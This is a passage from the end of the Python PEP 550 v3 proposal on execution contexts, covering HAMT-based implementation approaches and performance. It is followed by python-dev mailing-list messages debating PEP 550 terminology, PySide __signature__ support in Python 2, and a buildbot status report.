  application code, not from any of the Execution Context machinery
  or values they point to.
  This means that there are no reference cycles that could extend
  their lifespan longer than necessary, or prevent their garbage
  collection.

* Values put in the Execution Context are guaranteed to be kept alive
  while there is a ``ContextKey`` key referencing them in the thread.

* If a ``ContextKey`` is garbage collected, all of its values will be
  removed from all contexts, allowing them to be GCed if needed.

* If a thread has ended its execution, its thread state will be
  cleaned up along with its ``ExecutionContext``, cleaning up all
  values bound to all Context Keys in the thread.


ContextKey.get() Cache
----------------------

We can add three new fields to the ``PyThreadState``,
``PyInterpreterState``, and ``ContextKey`` structs:

* ``uint64_t PyThreadState->unique_id``: a globally unique thread
  state identifier (we can add a counter to ``PyInterpreterState``
  and increment it when a new thread state is created.)

* ``uint64_t ContextKey->version``: every time the key is updated in
  any logical context or thread, this field will be incremented.

The above two fields allow implementing a fast cache path in
``ContextKey.get()``, in pseudo-code::

    class ContextKey:

        def set(self, value):
            ...  # implementation
            self.version += 1

        def get(self):
            tstate = PyThreadState_Get()

            if (self.last_tstate_id == tstate.unique_id and
                    self.last_version == self.version):
                return self.last_value

            value = None
            for mapping in reversed(tstate.execution_context):
                if self in mapping:
                    value = mapping[self]
                    break

            self.last_value = value  # borrowed ref
            self.last_tstate_id = tstate.unique_id
            self.last_version = self.version

            return value

Note that ``last_value`` is a borrowed reference.  The assumption is
that if the current-thread and key-version tests pass, the object is
still alive.  This allows the CK values to be properly GCed.

This is similar to the trick that the C implementation of ``decimal``
uses for caching the current decimal context; it will have the same
performance characteristics, but be available to all Execution
Context users.


Approach #1: Use a dict for LogicalContext
------------------------------------------

The straightforward way of implementing the proposed EC mechanisms is
to create a ``WeakKeyDict`` on top of the Python ``dict`` type.

To implement the ``ExecutionContext`` type we can use a Python
``list`` (or a custom stack implementation with some pre-allocation
optimizations).

This approach will have the following runtime complexity:

* O(M) for ``ContextKey.get()``, where ``M`` is the number of Logical
  Contexts in the stack.

  It is important to note that ``ContextKey.get()`` will implement a
  cache making the operation O(1) for packages like ``decimal`` and
  ``numpy``.

* O(1) for ``ContextKey.set()``.

* O(N) for ``sys.get_execution_context()``, where ``N`` is the total
  number of keys/values in the current **execution** context.


Approach #2: Use HAMT for LogicalContext
----------------------------------------

Languages like Clojure and Scala use Hash Array Mapped Tries (HAMT)
to implement high performance immutable collections [5]_, [6]_.

Immutable mappings implemented with HAMT have O(log\ :sub:`32`\ N)
performance for ``set()``, ``get()``, and ``merge()`` operations,
which is essentially O(1) for relatively small mappings (read about
HAMT performance in CPython in the `Appendix: HAMT Performance`_
section.)

In this approach we use the same design of the ``ExecutionContext``
as in Approach #1, but we use a HAMT-backed weak-key Logical Context
implementation.
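The property that matters here is persistence: ``set()`` returns a
*new* mapping and leaves every existing reference untouched, so
capturing the current EC never requires a defensive copy.  The
following toy model illustrates that interface (it is a dict-based
stand-in with O(N) updates, not the proposed implementation; a real
HAMT achieves O(log\ :sub:`32`\ N))::

    class ImmutableMapping:
        """Illustrative stand-in for a HAMT-backed mapping."""

        def __init__(self, data=None):
            self._data = {} if data is None else data

        def set(self, key, value):
            # Copy-on-write: the original mapping is never mutated.
            new_data = dict(self._data)
            new_data[key] = value
            return ImmutableMapping(new_data)

        def get(self, key, default=None):
            return self._data.get(key, default)

    m1 = ImmutableMapping()
    m2 = m1.set('spam', 1)

    assert m1.get('spam') is None    # the old version is unchanged
    assert m2.get('spam') == 1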
With that we will have the following runtime complexity:

* O(M * log\ :sub:`32`\ N) for ``ContextKey.get()``, where ``M`` is
  the number of Logical Contexts in the stack, and ``N`` is the number
  of keys/values in the EC.  The operation will essentially be O(M),
  because execution contexts are normally not expected to have more
  than a few dozen keys/values.  (``ContextKey.get()`` will have the
  same caching mechanism as in Approach #1.)

* O(log\ :sub:`32`\ N) for ``ContextKey.set()``, where ``N`` is the
  number of keys/values in the current **logical** context.  This will
  essentially be an O(1) operation most of the time.

* O(log\ :sub:`32`\ N) for ``sys.get_execution_context()``, where
  ``N`` is the total number of keys/values in the current
  **execution** context.

Essentially, using HAMT for Logical Contexts instead of Python dicts
brings the complexity of ``sys.get_execution_context()`` down from
O(N) to O(log\ :sub:`32`\ N), because of the more efficient merge
algorithm.


Approach #3: Use HAMT and Immutable Linked List
-----------------------------------------------

We can make an alternative ``ExecutionContext`` design by using a
linked list.  Each ``LogicalContext`` in the ``ExecutionContext``
object will be wrapped in a linked-list node.

``LogicalContext`` objects will use the HAMT-backed weak-key
implementation described in Approach #2.

Every modification to the current ``LogicalContext`` will produce a
new version of it, which will be wrapped in a **new linked list
node**.  Essentially this means that ``ExecutionContext`` is an
immutable forest of ``LogicalContext`` objects, and can be safely
copied by reference in ``sys.get_execution_context()`` (eliminating
the expensive "merge" operation.)

With this approach, ``sys.get_execution_context()`` will be a constant
time **O(1) operation**.

In case we decide to apply additional optimizations such as flattening
ECs with too many Logical Contexts, the HAMT-backed immutable mapping
will have O(log\ :sub:`32`\ N) merge complexity.


Summary
-------

We believe that Approach #3 enables an efficient and complete
Execution Context implementation, with excellent runtime performance.

`ContextKey.get() Cache`_ enables fast retrieval of context keys for
performance-critical libraries like decimal and numpy.

Fast ``sys.get_execution_context()`` enables efficient management of
execution contexts in asynchronous libraries like asyncio.


Design Considerations
=====================

Can we fix ``PyThreadState_GetDict()``?
---------------------------------------

``PyThreadState_GetDict()`` is thread-local storage, and some of its
existing users might depend on it being just that.  Changing its
behaviour to follow the Execution Context semantics would break
backwards compatibility.


PEP 521
-------

:pep:`521` proposes an alternative solution to the problem: enhance
the Context Manager Protocol with two new methods, ``__suspend__`` and
``__resume__``.  To make it compatible with async/await, the
Asynchronous Context Manager Protocol will also need to be extended
with ``__asuspend__`` and ``__aresume__``.

This allows implementing context managers like the decimal context and
``numpy.errstate`` for generators and coroutines.
The following code::

    class Context:

        def __init__(self):
            self.key = new_context_key('key')

        def __enter__(self):
            self.old_x = self.key.get()
            self.key.set('something')

        def __exit__(self, *err):
            self.key.set(self.old_x)

would become this::

    local = threading.local()

    class Context:

        def __enter__(self):
            self.old_x = getattr(local, 'x', None)
            local.x = 'something'

        def __suspend__(self):
            local.x = self.old_x

        def __resume__(self):
            local.x = 'something'

        def __exit__(self, *err):
            local.x = self.old_x

Besides complicating the protocol, the implementation will likely
negatively impact performance of coroutines, generators, and any code
that uses context managers, and will notably complicate the
interpreter implementation.

:pep:`521` also does not provide any mechanism to propagate state in a
logical context, such as storing a request object in an HTTP request
handler to have better logging.  Nor does it solve the leaking-state
problem for greenlet/gevent.


Can Execution Context be implemented outside of CPython?
--------------------------------------------------------

Because async/await code needs an event loop to run it, an EC-like
solution can be implemented in a limited way for coroutines.

Generators, on the other hand, do not have an event loop or
trampoline, making it impossible to intercept their ``yield`` points
outside of the Python interpreter.


Should we update sys.displayhook and other APIs to use EC?
----------------------------------------------------------

APIs like redirecting stdout by overwriting ``sys.stdout``, or
specifying new exception display hooks by overwriting the
``sys.displayhook`` function, affect the whole Python process **by
design**.  Their users assume that the effect of changing them will be
visible across OS threads.  Therefore we cannot just make these APIs
use the new Execution Context.

That said, we think it is possible to design new APIs that will be
context-aware, but that is outside of the scope of this PEP.


Backwards Compatibility
=======================

This proposal preserves 100% backwards compatibility.


Appendix: HAMT Performance
==========================

While investigating how to implement an immutable mapping in CPython,
we were able to improve the efficiency of ``dict.copy()`` by up to
5 times [4]_.  One caveat is that the improved ``dict.copy()`` does
not resize the dict, which is necessary when items have been deleted
from it.  This means that we can make ``dict.copy()`` faster only for
dicts that don't need to be resized; the ones that do will use a
slower version.

To assess if HAMT can be used for Execution Context, we implemented it
in CPython [7]_.

.. figure:: pep-0550-hamt_vs_dict.png
   :align: center
   :width: 100%

   Figure 1.  Benchmark code can be found here: [9]_.

The chart illustrates the following:

* HAMT displays near O(1) performance for all benchmarked dictionary
  sizes.

* If we can use the optimized ``dict.copy()`` implementation ([4]_),
  the performance of an immutable mapping implemented with a Python
  ``dict`` is good up until 100 items.

* A dict with an unoptimized ``dict.copy()`` becomes very slow around
  100 items.

.. figure:: pep-0550-lookup_hamt.png
   :align: center
   :width: 100%

   Figure 2.  Benchmark code can be found here: [10]_.

Figure 2 shows a comparison of lookup costs between a Python dict and
a HAMT immutable mapping.  HAMT lookup time is 30-40% worse than
Python dict lookups on average, which is a very good result,
considering how well Python dicts are optimized.
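The copy-cost trend behind Figure 1 is easy to reproduce with a rough
micro-benchmark of the copy-on-write pattern (illustrative only, and
distinct from the benchmark code in [9]_; absolute numbers depend on
the machine and interpreter build)::

    import timeit

    for n in (10, 100, 1000):
        src = {i: i for i in range(n)}
        # Each "persistent update" of a dict-backed immutable mapping
        # pays for a full copy, so the cost grows linearly with size.
        t = timeit.timeit(lambda: dict(src), number=100000)
        print('copying a %4d-item dict: %.3fs per 100k copies' % (n, t))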
Note that, according to [8]_, the HAMT design can be further improved.

The bottom line is that it is possible to imagine a scenario in which
an application has more than 100 items in the Execution Context, in
which case the dict-backed implementation of an immutable mapping
becomes a subpar choice.  HAMT, on the other hand, guarantees that its
``set()``, ``get()``, and ``merge()`` operations will execute in
O(log\ :sub:`32`\ N) time, which makes it a more future-proof
solution.


Acknowledgments
===============

I thank Elvis Pranskevichus and Victor Petrovykh for countless
discussions around the topic and PEP proofreading and edits.

Thanks to Nathaniel Smith for proposing the ``ContextKey`` design
[17]_ [18]_, for pushing the PEP towards a more complete design, and
coming up with the idea of having a stack of contexts in the thread
state.

Thanks to Nick Coghlan for numerous suggestions and ideas on the
mailing list, and for coming up with a case that caused the complete
rewrite of the initial PEP version [19]_.


Version History
===============

1. Posted on 11-Aug-2017, view it here: [20]_.

2. Posted on 15-Aug-2017, view it here: [21]_.

   The fundamental limitation that caused a complete redesign of the
   first version was that it was not possible to implement an iterator
   that would interact with the EC in the same way as generators
   (see [19]_.)

   Version 2 was a complete rewrite, introducing new terminology
   (Local Context, Execution Context, Context Item) and new APIs.

3. Posted on 18-Aug-2017: the current version.

   Updates:

   * Local Context was renamed to Logical Context.  The term "local"
     was ambiguous and conflicted with local name scopes.

   * Context Item was renamed to Context Key; see the thread with Nick
     Coghlan, Stefan Krah, and Yury Selivanov [22]_ for details.

   * The Context Key ``get()`` cache design was adjusted, per
     Nathaniel Smith's idea in [24]_.

   * Coroutines are created without a Logical Context; the ceval loop
     no longer needs to special-case the ``await`` expression
     (proposed by Nick Coghlan in [23]_.)

   * The `Appendix: HAMT Performance`_ section was updated with more
     details about the proposed ``dict.copy()`` optimization and its
     limitations.


References
==========

.. [1] https://blog.golang.org/context

.. [2] https://msdn.microsoft.com/en-us/library/system.threading.executioncontext.aspx

.. [3] https://github.com/numpy/numpy/issues/9444

.. [4] http://bugs.python.org/issue31179

.. [5] https://en.wikipedia.org/wiki/Hash_array_mapped_trie

.. [6] http://blog.higher-order.net/2010/08/16/assoc-and-clojures-persistenthashmap-part-ii.html

.. [7] https://github.com/1st1/cpython/tree/hamt

.. [8] https://michael.steindorfer.name/publications/oopsla15.pdf

.. [9] https://gist.github.com/1st1/9004813d5576c96529527d44c5457dcd

.. [10] https://gist.github.com/1st1/dbe27f2e14c30cce6f0b5fddfc8c437e

.. [11] https://github.com/1st1/cpython/tree/pep550

.. [12] https://www.python.org/dev/peps/pep-0492/#async-await

.. [13] https://github.com/MagicStack/uvloop/blob/master/examples/bench/echoserver.py

.. [14] https://github.com/MagicStack/pgbench

.. [15] https://github.com/python/performance

.. [16] https://gist.github.com/1st1/6b7a614643f91ead3edf37c4451a6b4c

.. [17] https://mail.python.org/pipermail/python-ideas/2017-August/046752.html

.. [18] https://mail.python.org/pipermail/python-ideas/2017-August/046772.html

.. [19] https://mail.python.org/pipermail/python-ideas/2017-August/046775.html

.. [20] https://github.com/python/peps/blob/e8a06c9a790f39451d9e99e203b13b3ad73a1d01/pep-0550.rst
.. [21] https://github.com/python/peps/blob/e3aa3b2b4e4e9967d28a10827eed1e9e5960c175/pep-0550.rst

.. [22] https://mail.python.org/pipermail/python-ideas/2017-August/046801.html

.. [23] https://mail.python.org/pipermail/python-ideas/2017-August/046790.html

.. [24] https://mail.python.org/pipermail/python-ideas/2017-August/046786.html


Copyright
=========

This document has been placed in the public domain.

From ncoghlan at gmail.com  Sat Aug 19 03:37:06 2017
From: ncoghlan at gmail.com (Nick Coghlan)
Date: Sat, 19 Aug 2017 17:37:06 +1000
Subject: [Python-Dev] __signature__ for PySide ready
In-Reply-To:
References:
Message-ID:

On 19 August 2017 at 02:55, Jelle Zijlstra wrote:
> 2017-08-18 18:20 GMT+02:00 Yury Selivanov :
>> There's a backport of signature API to Python 2. Although last time I
>> checked it was fairly outdated.
>>
> I wrote a backport earlier this year: https://pypi.python.org/pypi/inspect2.

Nice.

Yury was probably referring to https://funcsigs.readthedocs.io/, which
is a partial backport specifically of inspect.Signature and friends.

Either way, the answer to Christian's original question is that "Yes,
supporting __signature__ is also useful in Python 2.x", as even though
the native inspect module doesn't support it, 3rd party backports do.

Cheers,
Nick.

-- 
Nick Coghlan   |   ncoghlan at gmail.com   |   Brisbane, Australia

From ncoghlan at gmail.com  Sat Aug 19 04:17:31 2017
From: ncoghlan at gmail.com (Nick Coghlan)
Date: Sat, 19 Aug 2017 18:17:31 +1000
Subject: [Python-Dev] PEP 550 v3
In-Reply-To:
References:
Message-ID:

On 19 August 2017 at 06:33, Yury Selivanov wrote:
> Hi,
>
> This is a third iteration of the PEP.
>
> There was some really good feedback on python-ideas and
> the discussion thread became hard to follow again, so I decided to
> update the PEP only three days after I published the previous
> version.
>
> Summary of the changes can be found in the "Version History"
> section: https://www.python.org/dev/peps/pep-0550/#version-history
>
> There are a few open questions left, namely the terminology
> and design of ContextKey API.  On the former topic, I'm quite
> happy with the latest version: Execution Context, Logical
> Context, and Context Key.

Nice, I quite like this version of the naming scheme and the core
design in general.

While Guido has a point about using the same noun for two different
things being somewhat confusing, I think the parallel here is the one
between the local scope and the lexical (nonlocal) scope for variable
names - just as your lexical scope is a nested stack of local scopes
in outer functions, your execution context is your current logical
context plus a nested stack of outer logical contexts.

> Generator Object Modifications
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>
> To achieve this, we make a small set of modifications to the
> generator object:
>
> * New ``__logical_context__`` attribute.  This attribute is readable
>   and writable for Python code.
>
> * When a generator object is instantiated its ``__logical_context__``
>   is initialized with an empty ``LogicalContext``.
>
> * Generator's ``.send()`` and ``.throw()`` methods are modified as
>   follows (in pseudo-C)::
>
>     if gen.__logical_context__ is not NULL:
>         tstate = PyThreadState_Get()
>
>         tstate.execution_context.push(gen.__logical_context__)
>
>         try:
>             # Perform the actual `Generator.send()` or
>             # `Generator.throw()` call.
>             return gen.send(...)
>         finally:
>             gen.__logical_context__ = tstate.execution_context.pop()
>     else:
>         # Perform the actual `Generator.send()` or
>         # `Generator.throw()` call.
>         return gen.send(...)

I think this pseudo-code expansion includes a few holdovers from the
original visibly-immutable API design.

Given the changes since then, I think this would be clearer if the
first branch used sys.run_with_logical_context(), since the logical
context references at the Python layer now behave like shared mutable
objects, and the apparent immutability of
sys.run_with_execution_context() comes from injecting a fresh logical
context every time.

Also +1 to the new design considerations questions that explicitly
postpone consideration of my "What about ..." questions from
python-ideas to future PEPs.

Cheers,
Nick.

-- 
Nick Coghlan   |   ncoghlan at gmail.com   |   Brisbane, Australia

From tismer at stackless.com  Sat Aug 19 04:38:37 2017
From: tismer at stackless.com (Christian Tismer)
Date: Sat, 19 Aug 2017 10:38:37 +0200
Subject: [Python-Dev] __signature__ for PySide ready
In-Reply-To:
References:
Message-ID: <358d5a13-f462-6297-6092-7c5dc5ce234d@stackless.com>

Hi Nick,

On 19.08.17 09:37, Nick Coghlan wrote:
> On 19 August 2017 at 02:55, Jelle Zijlstra wrote:
>> 2017-08-18 18:20 GMT+02:00 Yury Selivanov :
>>> There's a backport of signature API to Python 2. Although last time I
>>> checked it was fairly outdated.
>>>
>> I wrote a backport earlier this year: https://pypi.python.org/pypi/inspect2.
>
> Nice.
>
> Yury was probably referring to https://funcsigs.readthedocs.io/, which
> is a partial backport specifically of inspect.Signature and friends.
>
> Either way, the answer to Christian's original question is that "Yes,
> supporting __signature__ is also useful in Python 2.x", as even though
> the native inspect module doesn't support it, 3rd party backports do.

I did not use a backport, but simply hacked it together, myself:

- Take the signature part of Python 3.6 out,
- Adjust the syntax to Python 2.7.

The hairy part was my way to create the PySide PyCFunction objects in
a compatible way like Python 3 does it: the handling of PyCFunction's
"self" parameter is different (in Python 3 it holds type info; in
Python 2 it does not).  That needed much more internal knowledge than
intended...

Well, I thought the existence of __signature__ might be a good reason
to switch to Python 3, but if I support Python 2, the advantage is
gone.  But if it's ok with you, then I'll publish both versions.

Thanks a lot for the feedback.

Ciao - Chris

-- 
Christian Tismer             :^)   tismer at stackless.com
Software Consulting          :     http://www.stackless.com/
Karl-Liebknecht-Str. 121     :     https://github.com/PySide
14482 Potsdam                :     GPG key -> 0xFB7BEE0E
phone +49 173 24 18 776  fax +49 (30) 700143-0023

From solipsis at pitrou.net  Sat Aug 19 04:40:18 2017
From: solipsis at pitrou.net (Antoine Pitrou)
Date: Sat, 19 Aug 2017 10:40:18 +0200
Subject: [Python-Dev] PEP 550 v3
References:
Message-ID: <20170819104018.4353509c@fsol>

On Fri, 18 Aug 2017 16:33:27 -0400
Yury Selivanov wrote:
>
> There are a few open questions left, namely the terminology
> and design of ContextKey API.  On the former topic, I'm quite
> happy with the latest version: Execution Context, Logical
> Context, and Context Key.

I don't really like it.  "Logical Context" is vague (there are
lots of things called "context" in other libraries, so a bit of
specificity would help avoid confusion), and it's not clear what is
"logical" about it anyway.
"Local Context" actually seemed better to me (as it reminded of threading.local() or the general notion of thread-local storage). Regards Antoine. From tismer at stackless.com Sat Aug 19 04:54:17 2017 From: tismer at stackless.com (Christian Tismer) Date: Sat, 19 Aug 2017 10:54:17 +0200 Subject: [Python-Dev] __signature__ for PySide ready In-Reply-To: References: Message-ID: <8074edfb-1cb9-a869-6656-edc440b7d0f9@stackless.com> Hi Brett, On 18.08.17 18:31, Brett Cannon wrote: > > > On Fri, 18 Aug 2017 at 02:05 Christian Tismer > wrote: > ... > Is it a bad idea to support signatures in Python 2 as well? > Do I introduce a feature that should not exist in Python 2? > Or is it fine to do so? > > Please let me know your opinion, I am happy with any result. > > > If you're getting paid to do the port then I don't think it really hurts > anything since it isn't going to magically open Python 2 to more usage. > In fact, if you are filling in the annotation information so that type > hints are being exposed then maybe there's a chance it might help > someone port to Python 3? Well, I took extra precautions to make sure that existing PyCFunctions are not affected in any way. The new types are clones of the original types, and only PySide sees the additional attribute for it's functions. So, no, I don not create magically signatures for Python 2 functions. But I really warned my customer that the feature might not be welcomed for Python 2, and we might only enable it internally for testing. As said, I'm happy with either answer. Cheers -- Chris -- Christian Tismer :^) tismer at stackless.com Software Consulting : http://www.stackless.com/ Karl-Liebknecht-Str. 121 : https://github.com/PySide 14482 Potsdam : GPG key -> 0xFB7BEE0E phone +49 173 24 18 776 fax +49 (30) 700143-0023 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 496 bytes Desc: OpenPGP digital signature URL: From ncoghlan at gmail.com Sat Aug 19 06:33:27 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Sat, 19 Aug 2017 20:33:27 +1000 Subject: [Python-Dev] __signature__ for PySide ready In-Reply-To: <358d5a13-f462-6297-6092-7c5dc5ce234d@stackless.com> References: <358d5a13-f462-6297-6092-7c5dc5ce234d@stackless.com> Message-ID: On 19 August 2017 at 18:38, Christian Tismer wrote: > On 19.08.17 09:37, Nick Coghlan wrote: >> Either way, the answer to Christian's original question is that "Yes, >> supporting __signature__ is also useful in Python 2.x", as even though >> the native inspect module doesn't support it, 3rd party backports do. > > I did not use a backport, but simply hacked it together, myself: > > - Take the signature part of Python 3.6 out, > - Adjust the syntax to Python 2.7. The backports we're talking about are the ones that can *read* __signature__ attributes, as well as synthesise them from the underlying attributes on Python level functions and code objects. > The hairy part was my way to create the PySide PyCFunction objects in > a compatible way like Python 3 does it: the handling of PyCFunction's > "self" parameter is different (holds type info, Python 2 does not). > That needed much more internal knowledge as intended... > > Well, I thought the existence of __signature__ might be a good reason > to switch to Python 3, but if I support Python 2, the advantage > is gone. But if it's ok with you, then I'll publish both versions. 
The builtins and standard library extension modules in 2.7 will never
gain signature information (since there's no equivalent of Argument
Clinic to populate the __text_signature__ attributes).

However, aside from it being extra work that they may not want to do,
there's no particular reason for 3rd party modules to avoid providing
better signatures in Python 2.x.

Cheers,
Nick.

-- 
Nick Coghlan   |   ncoghlan at gmail.com   |   Brisbane, Australia

From brett at python.org  Sat Aug 19 13:06:00 2017
From: brett at python.org (Brett Cannon)
Date: Sat, 19 Aug 2017 17:06:00 +0000
Subject: [Python-Dev] PEP 550 v3
In-Reply-To: <20170819104018.4353509c@fsol>
References: <20170819104018.4353509c@fsol>
Message-ID:

On Sat, Aug 19, 2017, 01:43 Antoine Pitrou wrote:

> On Fri, 18 Aug 2017 16:33:27 -0400
> Yury Selivanov wrote:
> >
> > There are a few open questions left, namely the terminology
> > and design of ContextKey API.  On the former topic, I'm quite
> > happy with the latest version: Execution Context, Logical
> > Context, and Context Key.
>
> I don't really like it.  "Logical Context" is vague (there are
> lots of things called "context" in other libraries, so a bit of
> specificity would help avoid confusion), and it's not clear what is
> "logical" about it anyway.  "Local Context" actually seemed better to
> me (as it reminded of threading.local() or the general notion of
> thread-local storage).
>
> Regards
>
> Antoine.

I have to admit that I didn't even pick up on that name change.  I
could go either way.  I do appreciate dropping ContextItem, though,
because "CI" makes me think of continuous integration.

And the overall shape of the API for public consumption LGTM.

-brett

From brett at python.org  Sat Aug 19 13:07:58 2017
From: brett at python.org (Brett Cannon)
Date: Sat, 19 Aug 2017 17:07:58 +0000
Subject: [Python-Dev] Buildbot report, August 2017
In-Reply-To:
References:
Message-ID:

Thanks for all of this, Victor!

On Fri, 18 Aug 2017, 09:38 Victor Stinner wrote:

> Hi,
>
> Here is a quick report of what changed recently on buildbots.
>
>
> == pythoninfo ==
>
> I added a new "python3 -m test.pythoninfo" command which is now run on
> Travis CI, AppVeyor and buildbots.
>
> https://bugs.python.org/issue30871
>
> This command dumps various information to help debug test failures on
> our CIs.  For example, you get the Tcl version, information about the
> threading implementation, etc.
>
> Currently, pythoninfo is only run on the master branch, but I plan to
> run it on Python 3.6 and 2.7 later.
>
> The pythoninfo idea comes from https://bugs.python.org/issue29854 when
> we didn't know the readline version of a buildbot, and I didn't want
> to put such information in the regrtest header, since importing
> readline has side effects.
>
>
> == Removed buildbots ==
>
> A few buildbots were removed:
>
> * All Python 3.5 buildbots were removed, since the 3.5 branch entered
> the security-only stage:
> https://mail.python.org/pipermail/python-dev/2017-August/148794.html
>
> * FreeBSD 9-STABLE (koobs-freebsd9): FreeBSD 9 is no more supported
> upstream, use FreeBSD 10 and FreeBSD CURRENT buildbots
>
> * OpenIndiana: was offline since the beginning of June.
>   Previous discussions on this list:
>
>   * September 2016: OpenIndiana and Solaris support
>     https://mail.python.org/pipermail/python-dev/2016-September/146538.html
>   * April 2015: MemoryError and other bugs on AMD64 OpenIndiana 3.x
>     https://mail.python.org/pipermail/python-dev/2015-April/138967.html
>   * September 2014: Sad status of Python 3.x buildbots
>     https://mail.python.org/pipermail/python-dev/2014-September/136175.html
>
> * intel-ubuntu-skylake: Florin Papa wrote me that the machine became
> unavailable in December 2016.
>
> * Yosemite ICC buildbot (intel-yosemite-icc): it was maintained by
> Zachary Ware and R. David Murray.  Sadly, David lost the VM image to a
> disk crash :-( New ICC buildbots may come back later, wait & see ;-)
>
> * macOS Snow Leopard (murray-snowleopard): this old machine was stuck
> at boot for an unknown reason.  "It's an old machine, and it is
> probably time to get rid of it." wrote R. David Murray :-)
>
>
> == Reduced failure rate ==
>
> As usual, many race conditions were fixed in tests and in the code,
> to reduce the buildbot failure rate.
>
> I may list them in a blog post, later.
>
>
> == What's Next? ==
>
> * Buildbot should be upgraded to buildbot 0.9:
> https://github.com/python/buildmaster-config/pull/12
>
> * Zachary Ware plans to rewrite our buildbot configuration during the
> CPython sprint (Sept 4-9)
>
> * test_logging fails randomly on FreeBSD 10 with a warning related to
> threads (bpo-30830).  I had been trying to reproduce the bug for 2
> months, and I just identified the root bug!
> https://bugs.python.org/issue31233
> "socketserver.ThreadingMixIn leaks running threads after
> server_close()".
>
> * The "Docs" buildbot (currently offline) may be dropped as well,
> https://github.com/python/buildmaster-config/pull/21
>
>
> See also my previous buildbot report:
> https://haypo.github.io/python-buildbots-2017q2.html
>
> Victor

From ethan at stoneleaf.us  Sat Aug 19 14:57:16 2017
From: ethan at stoneleaf.us (Ethan Furman)
Date: Sat, 19 Aug 2017 11:57:16 -0700
Subject: [Python-Dev] PEP 550 v3
In-Reply-To: <20170819104018.4353509c@fsol>
References: <20170819104018.4353509c@fsol>
Message-ID: <59988A0C.30208@stoneleaf.us>

On 08/19/2017 01:40 AM, Antoine Pitrou wrote:
> On Fri, 18 Aug 2017 16:33:27 -0400 Yury Selivanov wrote:
>> There are a few open questions left, namely the terminology
>> and design of ContextKey API.  On the former topic, I'm quite
>> happy with the latest version: Execution Context, Logical
>> Context, and Context Key.
>
> I don't really like it.  "Logical Context" is vague (there are
> lots of things called "context" in other libraries, so a bit of
> specificity would help avoid confusion), and it's not clear what is
> "logical" about it anyway.
-- ~Ethan~ From gvanrossum at gmail.com Sat Aug 19 20:21:03 2017 From: gvanrossum at gmail.com (Guido van Rossum) Date: Sat, 19 Aug 2017 17:21:03 -0700 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: <59988A0C.30208@stoneleaf.us> References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> Message-ID: The way we came to "logical context" was via "logical thread (of control)", which is distinct from OS thread. But I think we might need to search for another term... On Aug 19, 2017 11:56 AM, "Ethan Furman" wrote: > On 08/19/2017 01:40 AM, Antoine Pitrou wrote: > >> On Fri, 18 Aug 2017 16:33:27 -0400 Yury Selivanov wrote: >> > > There are a few open questions left, namely the terminology >>> and design of ContextKey API. On the former topic, I'm quite >>> happy with the latest version: Execution Context, Logical >>> Context, and Context Key. >>> >> >> I don't really like it. "Logical Context" is vague (there are >> lots of things called "context" in other libraries, so a bit of >> specificity would help avoid confusion), and it's not clear what is >> "logical" about it anyway. "Local Context" actually seemed better to >> me (as it reminded of threading.local() or the general notion of >> thread-local storage). >> > > I am also not seeing the link between "logical" and "this local layer of > environmental changes that won't be seen by those who called me". > > Maybe ContextLayer? Or marry the two and call it LocalContextLayer. > > -- > ~Ethan~ > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/guido% > 40python.org > -------------- next part -------------- An HTML attachment was scrubbed... URL: From ncoghlan at gmail.com Sun Aug 20 01:41:36 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Sun, 20 Aug 2017 15:41:36 +1000 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> Message-ID: On 20 August 2017 at 10:21, Guido van Rossum wrote: > The way we came to "logical context" was via "logical thread (of control)", > which is distinct from OS thread. But I think we might need to search for > another term... Right. Framing it in pragmatic terms, the two entities that we're attempting to name are: 1. The mutable storage that ContextKey.set() writes to 2. The dynamic context that ContextKey.get() queries Right now, we're using ExecutionContext for the latter, and LogicalContext for the former, and I can definitely see Antoine's point that those names don't inherently convey any information about which is which. Personally, I still like the idea of moving ExecutionContext into the "mutable storage" role, and then finding some other name for the stack of execution contexts that ck.get() queries. For example, if we named the latter after what it's *for*, we could call it the DynamicQueryContext, and end up with the following invocation functions: # Replacing ExecutionContext in the current PEP DynamicQueryContext sys.get_dynamic_query_context() sys.new_dynamic_query_context() sys.run_with_dynamic_query_context() # Suggests immutability -> good! # Suggests connection to ck.get() -> good! 
# Replacing LogicalContext in the current PEP ExecutionContext sys.new_execution_context() sys.run_with_execution_context() __execution_context__ attribute on generators (et al) # Neutral on mutability/immutability # Neutral on ck.set()/ck.get() An alternative would be to dispense with the ExecutionContext name entirely, and instead use DynamicWriteContext and DynamicQueryContext. If we did that, I'd suggest omitting "dynamic" from the function and attribute names (while keeping it on the types), and end up with: # Replacing ExecutionContext in the current PEP DynamicQueryContext sys.get_query_context() sys.new_query_context() sys.run_with_query_context() # Suggests immutability -> good! # Suggests connection to ck.get() -> good! # Replacing LogicalContext in the current PEP DynamicWriteContext sys.new_write_context() sys.run_with_write_context() __write_context__ attribute on generators (et al) # Suggests mutability -> good! # Suggests connection to ck.set() -> good! In this variant, the phrase "execution context" could become a general term that covered *all* of the active state that a running piece of code has access to (the dynamic context, thread locals, closure variables, module globals, process globals, etc), rather than referring to any particular runtime entity. Cheers, Nick. P.S. Since we have LookupError (rather than QueryError) as the shared base exception type for KeyError and IndexError, it would also be entirely reasonable to replace "Query" in the above suggestions with "Lookup" (DynamicLookupContext, sys.get_lookup_context(), etc). That would also have the benefit of being less jargony, and more like conversational English. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From ethan at stoneleaf.us Sun Aug 20 04:18:13 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Sun, 20 Aug 2017 01:18:13 -0700 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> Message-ID: <599945C5.1030300@stoneleaf.us> On 08/19/2017 10:41 PM, Nick Coghlan wrote: > On 20 August 2017 at 10:21, Guido van Rossum wrote: >> The way we came to "logical context" was via "logical thread (of control)", >> which is distinct from OS thread. But I think we might need to search for >> another term... > > Right. Framing it in pragmatic terms, the two entities that we're > attempting to name are: > > 1. The mutable storage that ContextKey.set() writes to > 2. The 